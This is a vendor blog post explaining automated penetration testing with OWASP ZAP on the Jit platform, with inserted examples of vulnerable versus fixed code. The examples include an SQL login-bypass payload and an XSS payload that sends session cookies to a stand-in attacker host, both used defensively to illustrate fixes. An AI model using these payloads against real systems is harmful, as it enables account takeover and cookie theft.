A Step-by-Step Guide to Automated Penetration Testing with Jit

By Liron Biam

Published October 21, 2024.

Attackers are not just targeting obvious vulnerabilities but actively searching for new and unexpected weak spots. If you’re not regularly testing your defenses, you’re practically inviting them in.

The number of reported Common Vulnerabilities and Exposures (CVEs) rose by 30% in the first half of 2024. New security gaps are appearing, and—even more concerning—old vulnerabilities are finding their way back into companies’ systems.

The most effective way to uncover hidden vulnerabilities within your environment is to think like an attacker. By simulating real-world attacks, penetration testing goes deeper than other security scans, helping you understand where your risks truly lie. 

How Does Penetration Testing Work?

Penetration testing, or pen testing, is a method for evaluating the security of a system, network, or application by simulating a cyberattack. Companies usually outsource it to a specialized third-party vendor to identify hidden vulnerabilities that malicious actors could exploit and that other security scans might miss. 

Pen testing typically starts with reconnaissance, where testers gather detailed information about the target, such as domain names, IP addresses, and potential entry points. A scanning and enumeration phase then probes the system for open ports, running services, and known vulnerabilities in those services. 

In the exploitation phase, testers attempt to breach the system by exploiting these vulnerabilities, using methods that mirror real-world attack strategies, and then assess what an attacker could reach from the foothold they gain. The tester's findings, the methods used to find them, and any remediation recommendations are compiled into a report.

[Figure: the six steps of penetration testing]

Manual testing is still needed for complex, context-specific issues such as business-logic flaws and chained attacks, but much of the reconnaissance, scanning, and common-vulnerability discovery can be automated. Automated tools are increasingly effective for rapidly scanning systems, identifying common vulnerability classes, and covering large environments consistently. 

These tools can integrate with the rest of your DevOps security stack to continuously monitor for new threats and perform deep, consistent scans faster than manual methods.

What Can Penetration Testing Uncover?

1. Broken Authentication and Session Management

Broken authentication and session management refer to weaknesses in how users log in and maintain their sessions. Issues here include weak password policies, inadequate session expiration times, and poor handling of session tokens. For example, if session tokens are predictable, exposed in URLs, or set as cookies without the Secure and HttpOnly flags, they can be stolen and replayed, allowing attackers to impersonate legitimate users. 

[Figure: how a session token is issued and reused]

2. Injection Vulnerabilities

Injection vulnerabilities are an increasingly common attack vector. In 2023, 40 banks worldwide and over 50,000 users fell victim to JavaScript injection attacks.

These vulnerabilities appear when untrusted input, like user data, is concatenated directly into queries or commands instead of being passed as parameters or properly validated. Attackers can then supply input that changes the meaning of a database query or system command, leading to data theft, privilege escalation, or complete system compromise. 
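To make the mechanism concrete, here is an added example (not code from the Jit article): a login check that builds its SQL by string concatenation, beside the parameterized version, run against a constructed in-memory SQLite table. The user, password and payload are illustrative.

```python
# Added example (not code from the Jit article): a login check that builds
# SQL by string concatenation beside the parameterized version. The users
# table, the credentials and the payload are constructed for illustration.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Create an in-memory SQLite database with one constructed user."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Plaintext password keeps the demo short; real code stores a salted hash.
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The bug: untrusted input becomes part of the SQL text itself."""
    query = (
        f"SELECT 1 FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The fix: bound parameters, so a quote in the input stays data."""
    query = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


# Tautology payload: closes the password literal and appends OR '1'='1',
# so the WHERE clause is true for every row regardless of the password.
BYPASS_PAYLOAD = "' OR '1'='1"


def demo() -> dict:
    """Run both versions against the real password and the bypass payload."""
    conn = make_db()
    return {
        "vulnerable_valid_password": login_vulnerable(conn, "alice", "correct horse"),
        "vulnerable_bypass": login_vulnerable(conn, "alice", BYPASS_PAYLOAD),
        "safe_valid_password": login_safe(conn, "alice", "correct horse"),
        "safe_bypass": login_safe(conn, "alice", BYPASS_PAYLOAD),
    }


if __name__ == "__main__":
    for case, granted in demo().items():
        print(f"{case}: {'login granted' if granted else 'login denied'}")
```

With the payload, the vulnerable query becomes `... AND password = '' OR '1'='1'`, which is true for every row, so the login succeeds without the password; the parameterized query treats the same text as an ordinary (wrong) password. This is the class of flaw a ZAP active scan probes for by sending similar payloads to every parameter it finds.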

3. Security Misconfigurations

Security misconfigurations are among the most common vulnerabilities. They range from simple oversights, like leaving default credentials in place or failing to revoke access that is no longer needed, to more complex issues, such as misconfigured access controls in cloud environments. They can also leave unnecessary services running or create insecure network settings. 

4. Sensitive Data Exposure

Sensitive data exposure happens when private information, such as personal details, financial data, or authentication credentials, is accessible to attackers. This can occur because critical controls are missing: weak or absent encryption, poor data storage practices, or transmission over unencrypted channels. Its consequences include data breaches, identity theft, and financial loss.
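Items 1, 3 and 4 above (session handling, misconfiguration and sensitive data exposure) are mostly found by inspecting responses rather than by attacking them. The following is an added example (not code from the Jit article, and not one of ZAP's own rules): a minimal passive check in the spirit of ZAP's passive scan rules, applied to a constructed response from a weakly configured login page and to the same page after hardening. Hostnames, header values and the rule list are illustrative.

```python
# Added example (not code from the Jit article and not one of ZAP's own
# rules): a minimal passive check, in the spirit of ZAP's passive scan
# rules, applied to a constructed HTTP response. It flags the kinds of
# session-handling, misconfiguration and data-exposure issues described
# in items 1, 3 and 4 above. Hostnames and header values are illustrative.
from dataclasses import dataclass


@dataclass
class Response:
    url: str
    status: int
    headers: list  # (name, value) pairs; Set-Cookie may appear more than once


# Constructed: what a scanner might capture from a weakly configured login page.
WEAK_RESPONSE = Response(
    url="http://app.example.test/login",
    status=200,
    headers=[
        ("Content-Type", "text/html"),
        ("Server", "Apache/2.4.29 (Ubuntu)"),
        ("Set-Cookie", "sessionid=8f2c1a; Path=/"),
        ("Set-Cookie", "theme=dark; Path=/"),
    ],
)

# Constructed: the same page after hardening.
HARDENED_RESPONSE = Response(
    url="https://app.example.test/login",
    status=200,
    headers=[
        ("Content-Type", "text/html"),
        ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
        ("Content-Security-Policy", "default-src 'self'"),
        ("X-Content-Type-Options", "nosniff"),
        ("X-Frame-Options", "DENY"),
        ("Set-Cookie", "sessionid=8f2c1a; Path=/; Secure; HttpOnly; SameSite=Lax"),
    ],
)

SESSION_COOKIE_NAMES = {"sessionid", "jsessionid", "phpsessid", "connect.sid"}

REQUIRED_HEADERS = {
    "strict-transport-security": "HSTS missing: browsers may keep using plain HTTP",
    "content-security-policy": "CSP missing: no mitigation for injected scripts",
    "x-content-type-options": "X-Content-Type-Options missing: MIME sniffing allowed",
    "x-frame-options": "X-Frame-Options missing: page can be framed (clickjacking)",
}


def check_response(resp: Response) -> list:
    """Return (severity, message) tuples for one captured response."""
    findings = []
    present = {name.lower() for name, _ in resp.headers}

    # Sensitive data exposure: a login page over cleartext HTTP leaks credentials.
    if resp.url.lower().startswith("http://"):
        findings.append(("high", "login page served over cleartext HTTP"))

    # Session management: session cookies need Secure, HttpOnly and SameSite.
    for name, value in resp.headers:
        if name.lower() != "set-cookie":
            continue
        cookie_name = value.split("=", 1)[0].strip().lower()
        if cookie_name not in SESSION_COOKIE_NAMES:
            continue
        attrs = {part.strip().split("=", 1)[0].lower() for part in value.split(";")[1:]}
        for flag in ("secure", "httponly", "samesite"):
            if flag not in attrs:
                findings.append(("medium", f"session cookie {cookie_name} lacks {flag}"))

    # Misconfiguration: hardening headers absent.
    for header, message in REQUIRED_HEADERS.items():
        if header not in present:
            findings.append(("low", message))

    # Information disclosure: version strings help attackers pick exploits.
    for name, value in resp.headers:
        if name.lower() in ("server", "x-powered-by") and any(c.isdigit() for c in value):
            findings.append(("low", f"{name} header leaks a version string: {value}"))

    return findings


def count_by_severity(findings: list) -> dict:
    """Summarize findings as {severity: count}."""
    counts = {}
    for severity, _ in findings:
        counts[severity] = counts.get(severity, 0) + 1
    return counts


if __name__ == "__main__":
    for label, resp in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(f"{label}: {count_by_severity(check_response(resp))}")
        for severity, message in check_response(resp):
            print(f"  [{severity}] {message}")
```

The weak response yields one high (cleartext login), three medium (session cookie missing Secure, HttpOnly and SameSite) and five low findings; the hardened response yields none. A real passive scanner applies many more rules, but each one is a check of this shape over captured traffic, which is why passive scanning is safe to run against production while active scanning is not.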

5. Broken Access Control

Broken access control is when users can perform actions beyond their intended permissions. This can occur if role-based or ownership checks are not enforced server-side, allowing users to access other users' data or restricted functions. If attackers can escalate privileges to an admin level, they can gain complete control over your systems. 
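The most common form of this in web applications is an insecure direct object reference: an endpoint that looks up a record by the id the client sends and never asks who is asking. Here is an added example (not code from the Jit article) of such an invoice endpoint beside a version that derives identity from the server-side session and checks ownership or admin role. Users, invoices and session tokens are constructed for illustration.

```python
# Added example (not code from the Jit article): an invoice lookup that
# trusts client-supplied parameters (an insecure direct object reference,
# one form of broken access control) beside a version that derives the
# caller's identity from the server-side session and checks ownership or
# role before returning data. Users, invoices and tokens are constructed.

INVOICES = {1001: "alice", 1002: "bob"}                      # invoice id -> owner
USERS = {"alice": "user", "bob": "user", "carol": "admin"}   # user -> role
SESSIONS = {"tok-alice": "alice", "tok-bob": "bob", "tok-carol": "carol"}


class AccessDenied(Exception):
    pass


def get_invoice_vulnerable(params: dict) -> dict:
    """The bug: any caller who can guess an invoice id can read it, and the
    'user_id' parameter is whatever the client chose to send."""
    invoice_id = int(params["invoice_id"])
    return {"invoice_id": invoice_id, "owner": INVOICES[invoice_id],
            "viewed_as": params.get("user_id")}


def get_invoice_safe(session_token: str, params: dict) -> dict:
    """The fix: identity comes from the session, and access is granted only
    to the owner or to an admin. Missing and forbidden look the same to the
    caller so invoice ids cannot be enumerated."""
    user = SESSIONS.get(session_token)
    if user is None:
        raise AccessDenied("not authenticated")
    invoice_id = int(params["invoice_id"])
    owner = INVOICES.get(invoice_id)
    if owner is None or (owner != user and USERS[user] != "admin"):
        raise AccessDenied("no access")
    return {"invoice_id": invoice_id, "owner": owner, "viewed_as": user}


def outcome(session_token: str, params: dict) -> str:
    """Summarize the safe endpoint's decision as a string for comparison."""
    try:
        return "granted:" + get_invoice_safe(session_token, params)["owner"]
    except AccessDenied as exc:
        return "denied:" + str(exc)


def demo() -> dict:
    """Alice tries to read Bob's invoice 1002 through both endpoints."""
    bobs_invoice = {"invoice_id": "1002", "user_id": "alice"}
    return {
        "vulnerable_alice_reads_bob": get_invoice_vulnerable(bobs_invoice)["owner"],
        "safe_alice_reads_bob": outcome("tok-alice", bobs_invoice),
        "safe_bob_reads_own": outcome("tok-bob", bobs_invoice),
        "safe_admin_reads_bob": outcome("tok-carol", bobs_invoice),
        "safe_unknown_invoice": outcome("tok-alice", {"invoice_id": "9999"}),
        "safe_no_session": outcome("bogus", bobs_invoice),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case}: {result}")
```

Note that a scanner can only detect this class when it has two authenticated identities to compare, which is one reason authenticated scanning (discussed in the setup steps below) matters, and why manual testing still finds most access-control issues.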

6. Cross-Site Scripting (XSS)

Cross-site scripting (XSS) vulnerabilities occur when untrusted input is rendered into a page without proper output encoding, so the browser executes it as script, enabling attacks like session hijacking or data theft. Automated tools identify common XSS vectors, while manual testing uncovers complex, context-dependent injection points, such as DOM-based XSS or unusual input sinks.
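Because the fix depends on where the input lands, here is an added example (not code from the Jit article) of a server-rendered page that reflects a display name into HTML text, an attribute and a link, beside the version that encodes for the HTML context and validates the URL context separately. The page fragment, payload and hostnames are constructed for illustration.

```python
# Added example (not code from the Jit article): a reflected-XSS sink in a
# server-rendered page beside the output-encoded version, plus a URL sink,
# which needs scheme validation rather than HTML escaping. The page
# fragment, the payload and the hostnames are constructed for illustration.
import html
from urllib.parse import urlsplit

# Closes the value="" attribute, then injects a script that exfiltrates cookies.
PAYLOAD = '"><script>new Image().src="http://evil.example.test/?c="+document.cookie</script>'


def render_vulnerable(name: str, homepage: str) -> str:
    """The bug: untrusted input is pasted into HTML text, an attribute and a URL."""
    return (
        f"<p>Hello, {name}</p>"
        f'<input name="display_name" value="{name}">'
        f'<a href="{homepage}">homepage</a>'
    )


def safe_href(url: str) -> str:
    """Allow only http(s) links; javascript: and data: URLs are dropped."""
    scheme = urlsplit(url.strip()).scheme.lower()
    return html.escape(url, quote=True) if scheme in ("http", "https") else "#"


def render_safe(name: str, homepage: str) -> str:
    """The fix: encode for the HTML context (quote=True also covers quoted
    attributes) and validate the URL context separately. This does not
    cover unquoted attributes or JavaScript string contexts."""
    safe_name = html.escape(name, quote=True)
    return (
        f"<p>Hello, {safe_name}</p>"
        f'<input name="display_name" value="{safe_name}">'
        f'<a href="{safe_href(homepage)}">homepage</a>'
    )


def contains_script(page: str) -> bool:
    """Crude detector: is there a live <script> tag or javascript: link?"""
    lowered = page.lower()
    return "<script" in lowered or 'href="javascript:' in lowered


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD, "javascript:alert(document.domain)"))
    print(render_safe(PAYLOAD, "javascript:alert(document.domain)"))
    print(render_safe("Tom & Jerry", "https://example.test/tom"))
```

Server-side encoding like this is what a scanner is checking for when it reflects a marker payload and looks for it unencoded in the response. It does nothing for DOM-based XSS, where client-side JavaScript reads `location.hash` or similar and writes it into the page itself; that sink lives in the browser, which is why the text above notes that it usually takes manual testing to find.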

[Figure: a cross-site scripting attack]

A Step-by-Step Guide to Automated Penetration Testing with Jit

OWASP ZAP (Zed Attack Proxy) is an open-source dynamic application security testing (DAST) tool that simulates real-world attacks against a running web application to find security flaws such as SQL injection, cross-site scripting (XSS), and insecure settings. 

You can customize the depth and focus of the scans. ZAP is especially useful when integrated into your CI/CD pipeline, enabling continuous security checks without slowing development. It also provides detailed reports to help you fix any issues it finds.
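The part of a CI/CD integration that most teams end up writing themselves is the gate: deciding from the scan report whether the pipeline passes. Here is an added example (not code from the Jit article, and not Jit's own integration) of such a gate over a ZAP JSON report, of the kind zap-baseline.py or zap-api-scan.py writes with the -J option. The report below is constructed to mirror the report's shape (site, alerts, instances, riskcode); its alert names, plugin ids and URLs are illustrative.

```python
# Added example (not code from the Jit article, and not Jit's integration):
# a CI gate that reads a ZAP JSON report, such as the file zap-baseline.py
# or zap-api-scan.py writes with -J, and fails the build when any alert
# reaches a chosen risk level. The report below is constructed to mirror
# the report shape (site -> alerts -> instances); the alert names, plugin
# ids and URLs are illustrative.
import json

RISK_LEVELS = {"informational": 0, "low": 1, "medium": 2, "high": 3}
RISK_NAMES = {level: name for name, level in RISK_LEVELS.items()}

SAMPLE_REPORT_JSON = json.dumps({
    "@version": "2.15.0",
    "site": [{
        "@name": "https://app.example.test",
        "alerts": [
            {"pluginid": "10038", "alert": "Content Security Policy (CSP) Header Not Set",
             "riskcode": "1", "confidence": "2",
             "instances": [{"uri": "https://app.example.test/", "method": "GET"}]},
            {"pluginid": "40012", "alert": "Cross Site Scripting (Reflected)",
             "riskcode": "2", "confidence": "2",
             "instances": [{"uri": "https://app.example.test/search?q=x",
                            "method": "GET", "param": "q"}]},
            {"pluginid": "40018", "alert": "SQL Injection",
             "riskcode": "3", "confidence": "2",
             "instances": [{"uri": "https://app.example.test/login",
                            "method": "POST", "param": "username"}]},
            {"pluginid": "10021", "alert": "X-Content-Type-Options Header Missing",
             "riskcode": "1", "confidence": "2",
             "instances": [{"uri": "https://app.example.test/", "method": "GET"}]},
        ],
    }],
})


def parse_alerts(report_json: str) -> list:
    """Flatten every site's alerts into dicts with an integer risk level."""
    alerts = []
    for site in json.loads(report_json).get("site", []):
        for alert in site.get("alerts", []):
            alerts.append({
                "site": site.get("@name", ""),
                "pluginid": str(alert.get("pluginid", "")),
                "name": alert.get("alert", ""),
                "risk": int(alert.get("riskcode", 0)),   # ZAP stores it as a string
                "instances": len(alert.get("instances", [])),
            })
    return alerts


def gate(report_json: str, fail_on: str = "medium", accepted: set = frozenset()) -> tuple:
    """Return (passed, blocking_alerts). Alerts at or above fail_on block the
    build unless their plugin id is in `accepted`, which plays the role of a
    reviewed risk-acceptance list."""
    threshold = RISK_LEVELS[fail_on.lower()]
    blocking = [a for a in parse_alerts(report_json)
                if a["risk"] >= threshold and a["pluginid"] not in accepted]
    blocking.sort(key=lambda a: a["risk"], reverse=True)
    return (not blocking, blocking)


if __name__ == "__main__":
    import sys
    passed, blocking = gate(SAMPLE_REPORT_JSON, fail_on="medium")
    for a in blocking:
        print(f"[{RISK_NAMES[a['risk']].upper()}] {a['name']} "
              f"({a['instances']} instance(s) on {a['site']})")
    sys.exit(0 if passed else 1)
```

Failing on medium and above is a reasonable default for a daily scan; failing only on high keeps a per-deployment scan from blocking releases on header hygiene. The accepted set is the place to record findings a reviewer has triaged as false positives or accepted risk, rather than lowering the threshold for everyone.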

[Screenshot: the OWASP ZAP automated scan screen]

You can learn how to run an OWASP ZAP scan on its own, but setting it up with Jit automates ZAP deployment and continuous scanning. The step-by-step guide for deploying ZAP with Jit will take you through the process.

When you integrate OWASP ZAP with Jit, the penetration testing process becomes fully automated and more efficient. The ASPM platform uses ZAP’s scanning power through its Security Plans, letting you run tests directly from its platform. 

These plans handle the setup, execution, and analysis of ZAP scans, streamlining your workflow. The platform automatically triggers daily scans, organizes results, and prioritizes vulnerabilities using advanced filtering and contextual analysis.

1. Prerequisites

Before getting started, ensure you have the following in place:

  • A Jit account with access to the platform. You can create an account for free if you haven’t already done so. 

  • Administrative access to the application or system you plan to test, and permission to test it. Prefer a staging or test environment: an active scan sends attack payloads that can create, modify, or delete data.

2. Activate the Dynamic Application Security Testing Plan

Begin by logging into Jit and navigating to the Security Plans tab. Select the Dynamic Application Security Testing Plan to access the scanning controls. Click the Activate option to either Scan your API for vulnerabilities or Scan your web application for vulnerabilities (or both!) to initiate the OWASP ZAP setup process.

3. Configure OWASP ZAP for Automated Penetration Testing

Start by identifying a web app to configure automated penetration testing for. If needed, Jit can scan multiple web apps at once; just click "Add new application" to add another web app.

[Screenshot: adding a web application to scan]

In the Configure Security Control pop-up window, you need to supply the following information (see screenshot below):

  • Application Name

  • Target URL – Enter the web application URL you want to scan.

  • Exclude URLs (optional) – Paths to leave out of the scan, for example a logout page that would end the scanner's session.

  • API Domain –  If your web application is tied to an API, add the relevant domain to include it in the scan.

To scan pages that sit behind a login, you'll need to contact Jit to enable authenticated scanning. 

[Screenshot: the Configure Security Control window for a web application]

You can also define trigger conditions or set up real-time notifications through Slack integration. 

The scan runs daily by default, but you can configure it to trigger on every deployment. 

[Screenshot: the settings section with trigger and notification options]

4. Configure OWASP ZAP for API Scanning

If you’re focusing on API security, provide the following information to configure OWASP ZAP:

  • Application Name

  • Upload an OpenAPI File – Upload an OpenAPI (formerly known as Swagger) file. This file defines the endpoints that OWASP ZAP will scan, providing a roadmap for the testing process.

  • Exclude URLs (optional)

  • API Domain—Input the base URL where your API is hosted. OWASP ZAP will use this URL as the entry point for making requests.

Again, you may need to contact Jit support to set up authentication. You can customize trigger conditions and set up notifications through Slack for your API if you'd like. 

[Screenshot: the Configure Security Control window for an API]

5. Automated Penetration Testing

OWASP ZAP will automatically run daily or on each deployment, depending on your chosen triggers, so your application or API is continually tested against the latest build.

6. Review, Prioritize, and Remediate Vulnerabilities

Once you receive OWASP ZAP scan results, it's time to manage and address the security findings effectively. You can view the results in Jit’s backlog. Filter the security findings to focus on the most critical issues quickly.

You can further streamline the remediation process by using Jit Actions to address vulnerabilities in bulk. Jit can automatically create pull requests (PRs) that fix multiple vulnerabilities at once to make the resolution process more efficient on your end. 

Align Penetration Testing to Specific Objectives

While implementing automated penetration testing can help security teams uncover critical vulnerabilities, it can be difficult to align these checks to specific outcomes, like surfacing the vulnerability classes described in the OWASP Top 10 or satisfying items in the OWASP ASVS framework. 

For this reason, Jit builds Security Plans that align penetration testing checks to specific line items in these security frameworks. In the example below, you can activate Jit security checks, based on OWASP ZAP, that map to OWASP Top 10 items such as Broken Access Control or Injection.

[Screenshot: Security Plan checks mapped to OWASP Top 10 items]

Closing the Gaps with Jit

Automated penetration testing is often a front line of defense, finding the gaps that attackers are counting on, whether injection flaws, weak authentication, or misconfigurations. Automated tools like OWASP ZAP can dig deep and fast, flagging those risks before they're exploited.

Jit helps you take the fuss out of pen testing your applications and APIs by integrating the power of OWASP ZAP directly into your CI/CD pipeline. The ASPM platform automates your scans, organizes the findings, and even automates remediation fixes, helping you prioritize and resolve vulnerabilities with enriched insights. Why guess about the strength of your defenses when you can know for sure? Visit Jit to learn more.